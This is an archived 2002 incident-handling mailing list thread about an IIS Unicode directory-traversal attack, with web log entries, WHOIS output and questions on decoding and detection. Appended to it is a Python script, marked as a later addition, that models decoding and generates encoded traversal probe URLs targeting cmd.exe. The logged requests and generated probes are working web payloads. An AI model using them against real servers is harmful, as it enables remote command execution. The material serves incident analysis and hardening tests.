RE: Unicode Attack (FOLLOW UP)

From: Jeremy Junginger <jjunginger(at)usbestcrm.com>
Date: Wed Nov 13 2002 - 12:52:37 EST


Follow up:

The attacking host at 210.201.100.253 is a Windows 2000 Chinese Server, trojaned with RemoteNC running on port 5700 (which is password protected). He is also running "X-FTP" which allows anonymous downloading as well as posting (d'oh). It seems reasonable to assume that this host is being controlled by a malicious entity that is using it to fire off automated scripts. Also an interesting note is the following:

Search results for: 210.201.100.253

OrgName: Asia Pacific Network Information Centre
OrgID: APNIC

NetRange: 210.0.0.0 - 211.255.255.255
CIDR: 210.0.0.0/7
NetName: APNIC-CIDR-BLK2
NetHandle: NET-210-0-0-0-1
Parent:
NetType: Allocated to APNIC

NameServer: ns1.apnic.net
NameServer: ns3.apnic.net
NameServer: ns.ripe.net
NameServer: rs2.arin.net
NameServer: dns1.telstra.net

Comment: This IP address range is not registered in the ARIN database.
         For details, refer to the APNIC Whois Database via
         WHOIS.APNIC.NET or http://www.apnic.net/apnic-bin/whois2.pl
         ** IMPORTANT NOTE: APNIC is the Regional Internet Registry
         for the Asia Pacific region. APNIC does not operate networks
         using this IP address range and is not able to investigate
         spam or abuse reports relating to these addresses. For more
         help, refer to http://www.apnic.net/info/faq/abuse

RegDate: 1996-07-01
Updated: 2002-09-11

OrgTechHandle: SA90-ARIN
OrgTechName: System Administrator, System
OrgTechPhone: +61 7 3858 3100
OrgTechEmail:

# ARIN Whois database, last updated 2002-11-12 19:05
# Enter ? for additional hints on searching ARIN's Whois database.


Interesting how they "are not able to investigate SPAM or abuse reports relating to these ranges." Looks like a perfect place for a zombie. Thoughts? What would you do?

-Jeremy

-----Original Message-----
From: Jeremy Junginger
Sent: Wednesday, November 13, 2002 7:51 AM
To: incidents@securityfocus.com
Subject: Unicode Attack

It's time again to ask the group for some assistance with interpretation of web logs and snort alerts. There was some funny activity on the web farm. I noticed a couple "ATTACK RESPONSES-http dir listing" attacks on some of our web servers, cueing me in to the fact that the servers in question were not patched against a Unicode-type vulnerability. I found the offending IP, and tracked it back to a broadband home connection. I think with reasonable certainty that the attack was not spoofed (because of the nature of TCP and the fact that he received a response from the web server); however, I cannot rule out the possibility of the host being compromised. Knowing this, I reported it to our ISP and blocked access immediately, and began to analyze the logs more closely. The web logs are continuous, so I am assuming that they are intact, though they may be suspect. There are no lapses in time, and the logs appear to be fairly contiguous. I also noticed that the attack was scripted, as there were many WEB-IIS SAM RETRIEVAL attempts interspersed with the Unicode strings, all happening in less than 10 seconds. The log entries of the first server are below.

Web log entries:

2002-11-12 13:00:37 210.201.100.253 - x.x.x.17 80 GET /scripts/..%5c../..%5c../..%5cwinnt/system32/cmd.exe /c+dir 200 1849 321 31 HTTP/1.1 63.241.137.233 Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0) - -

2002-11-12 13:00:37 210.201.100.253 - x.x.x.17 80 GET /scripts/..%5c../..%5c../..%5cwinnt/system32/cmd.exe /c+dir 200 1849 321 31 HTTP/1.1 63.241.137.233 Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0) - -

This is an IIS 5.0/Win2k Server with SP2 and Latest Hotfixes per HFNETCHECK, which I thought would preclude this server from being vulnerable to a Unicode-type attack. The only thing that has not been done is running URLSCAN and IISLOCKDOWN. Obviously, these will be my steps for patching the servers, but I would like to ask for some assistance with replicating the attack.


INTERESTING NOTE: The web logs indicate that the URL Requested was
(correct me if I'm wrong)
http://x.x.x.17/scripts/..%5c..%5c..%5cwinnt/system32.cmd.exe?/c+dir
(possibly with a c:\ at the end).

When running this URL against the server, it produces a 404 error on the server rather than listing the drive contents. The snort logs (Snort/MySQL/PHP/ACID/Apache) indicate that the URL was http://x.x.x.17/scripts/..%5c..%5c..%5cwinnt/system32.cmd.exe?/c+dir .

I guess my question is three-fold:

  1. Does the IIS server "decode" the string before logging it to the web logs?
  2. Does the Snort IDS "decode" the string before logging it to MySQL?
  3. Since there are few (if any) thorough Unicode scanners, is it possible to write a perl script that could check for all possible Unicode variants on a given web server to test the effectiveness of the URLSCAN and IISLOCKDOWN utilities (pre-change/post-change pen-test)? I have some "shell" programs like uni.pl, but am a little confused about how to generate all of the possible combinations.

If you guys can provide any assistance with this, it would be great. If not, thanks for taking the time to read the post. Have a good one!

-Jeremy
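The decode and variant questions in the post above, as an added example that is not part of the original post or of any tool it names. The log entries on this page still contain "%5c", so the logger recorded the request as received; what matters is what the server made of it afterwards. The script models the check-then-decode bug class with a lenient percent decoder (a simplified model, not IIS's own canonicaliser), runs it over a log line constructed in the shape of the entries above, and lists the "../" spellings a pre/post-URLScan check should send. The W3C field order, the separator list and the "bypass" notion are assumptions made here; the %c0%af / %c1%9c (overlong UTF-8) and %255c (double decode) forms are the widely reported Unicode and double-decode spellings.

```python
"""Offline triage of traversal requests as logged by IIS (added example).

Two things it shows: (1) what a lenient decoding server makes of the
URI as logged, and whether the decoded path climbs above the web root;
(2) the encoding variants of "../" a hardening check should try.
The decoder is a simplified model: percent-decode, fold overlong UTF-8,
optional second decode pass.  It is an assumption, not IIS code.
"""
import re

HEXDIGITS = b"0123456789abcdefABCDEF"

# Overlong UTF-8 spellings of '/' (0x2F) and '\' (0x5C).  The two-byte forms
# are the ones reported against IIS; the three-byte forms complete the set.
OVERLONG = {
    b"\xc0\xaf": b"/", b"\xe0\x80\xaf": b"/",
    b"\xc1\x9c": b"\\", b"\xe0\x81\x9c": b"\\",
}

# Separator spellings placed after ".." when generating probe URLs (assumed list).
DOTDOT_SEPARATORS = {
    "plain_slash": "../",
    "plain_backslash": "..\\",
    "pct_slash": "..%2f",
    "pct_backslash": "..%5c",
    "overlong_slash": "..%c0%af",
    "overlong_backslash": "..%c1%9c",
    "double_pct_slash": "..%252f",
    "double_pct_backslash": "..%255c",
    "pct_inside_pct": "..%%35c",
}


def percent_decode(data: bytes) -> bytes:
    """One lenient decoding pass: '%hh' becomes a byte, anything else is kept."""
    out, i = bytearray(), 0
    while i < len(data):
        if (data[i] == 0x25 and i + 2 < len(data)
                and data[i + 1] in HEXDIGITS and data[i + 2] in HEXDIGITS):
            out.append(int(data[i + 1:i + 3], 16))
            i += 3
        else:
            out.append(data[i])
            i += 1
    return bytes(out)


def fold_overlong(data: bytes) -> bytes:
    """Map overlong UTF-8 separator spellings to the plain separator."""
    for seq, char in OVERLONG.items():
        data = data.replace(seq, char)
    return data


def server_view(raw_uri: str, double_decode: bool = False) -> str:
    """Model of the path a decoding server ends up with (assumption, not IIS code)."""
    path = fold_overlong(percent_decode(raw_uri.encode("latin-1")))
    if double_decode:
        path = fold_overlong(percent_decode(path))
    return path.decode("latin-1")


def escapes_webroot(path: str) -> bool:
    """True if resolving '..' segments (split on either slash) climbs above root."""
    depth = 0
    for seg in re.split(r"[/\\]", path):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False


def check_then_decode_bypass(stem: str, double_decode: bool = False) -> bool:
    """Models the bug class: a '..' check on the raw path that decoding undoes.
    True when the raw path looks safe but the decoded path escapes the root."""
    return (not escapes_webroot(stem)
            and escapes_webroot(server_view(stem, double_decode)))


def classify_iis_line(line: str) -> dict:
    """Parse one W3C extended IIS line.  Field order is assumed to be
    'date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query
    sc-status ...' (the #Fields header is not on the page)."""
    f = line.split()
    stem = f[7]
    return {
        "client": f[2],
        "status": f[9],
        "raw_traversal": escapes_webroot(stem),
        "decoded_traversal": escapes_webroot(server_view(stem)),
        "double_decoded_traversal": escapes_webroot(server_view(stem, True)),
    }


def probe_urls(prefix="/scripts/", depth=3, target="winnt/system32/cmd.exe?/c+dir"):
    """(name, url, bypasses single-decode model, bypasses double-decode model)."""
    rows = []
    for name, sep in DOTDOT_SEPARATORS.items():
        url = prefix + sep * depth + target
        stem = url.split("?", 1)[0]
        rows.append((name, url, check_then_decode_bypass(stem),
                     check_then_decode_bypass(stem, double_decode=True)))
    return rows


# Constructed sample line in the shape of the post's entries (x.x.x.17 kept).
SAMPLE = ("2002-11-12 13:00:37 210.201.100.253 - x.x.x.17 80 GET "
          "/scripts/..%5c../..%5c../..%5cwinnt/system32/cmd.exe /c+dir 200 "
          "1849 321 31 HTTP/1.1 63.241.137.233 "
          "Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0) - -")

if __name__ == "__main__":
    print(classify_iis_line(SAMPLE))
    for row in probe_urls():
        print(row)
```

The raw stem from the log has no bare ".." segment, so a check done before decoding passes it; the single-decoded path climbs two levels above /scripts, which is the listing the snort "dir listing" signature saw. The double-encoded rows only flip to true under the second decode pass, which is why a scanner built from this list needs to send both families rather than just the %c0%af forms.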




This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com

Received on Wed Nov 13 17:39:35 2002

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:01:50 EDT

